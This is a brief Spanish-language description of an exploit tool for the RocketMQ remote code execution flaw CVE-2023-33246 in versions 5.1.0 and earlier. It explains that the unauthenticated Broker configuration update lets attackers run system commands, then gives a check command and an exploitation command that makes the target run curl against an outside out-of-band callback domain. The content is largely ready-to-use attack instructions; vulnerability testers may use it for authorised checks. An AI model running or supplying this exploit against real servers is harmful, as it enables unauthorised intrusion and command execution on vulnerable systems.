
Exploit de ejecución remota de código en RocketMQ CVE-2023-33246
Las versiones de RocketMQ 5.1.0 y anteriores son vulnerables a la inyección de código arbitrario. El componente Broker de RocketMQ queda expuesto en la extranet y carece de verificación de permisos. Un atacante puede explotar esta vulnerabilidad mediante la función de actualización de configuración para ejecutar comandos como los usuarios del sistema con los que se ejecuta RocketMQ. Además, un atacante puede lograr el mismo efecto falsificando el contenido del protocolo RocketMQ.
verificación
./RocketMQRceCheck -host 127.0.0.1 -port 9876
explotación
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test